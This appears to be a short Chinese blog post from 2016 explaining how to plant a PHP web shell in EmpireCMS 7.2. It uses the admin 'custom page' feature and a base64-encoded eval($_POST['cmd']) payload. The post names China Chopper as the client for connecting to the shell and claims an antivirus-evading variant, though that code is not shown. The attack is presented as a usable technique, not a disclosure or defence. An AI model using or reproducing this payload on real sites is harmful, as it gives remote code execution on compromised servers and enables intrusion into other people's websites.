[安全漏洞]帝国cms7.2后台一句话漏洞免杀版

    来源:本站原创 浏览:5213次 时间:2016-03-01
都知道帝国cms的安全性能也是数一数二的,很多做SEO的站都选择了帝国cms。我有一个济宁seo的站点就是用帝国cms的,发现之前有过7.2的一个漏洞,如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行!
自定义页面-增加自定义页面-随便写了xxx.php文件名,页面内容填写,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。 所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧!!
如果说,服务器安装了杀软 默认的这种是直接被杀掉的。
我写了一个免杀的一句话 在护卫神已经测试过免杀 其他的其他大伙再进行测试吧。!
digguocms
密码是cmd 
不过说下 这个适合那种留后面的一句话使用 如果说 不知道后台账号密码的话也是白搭 提交乌云网肯定会被官方忽略的 而且 就一个破免杀 提乌云 丢人
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 技术文档 » 文章详细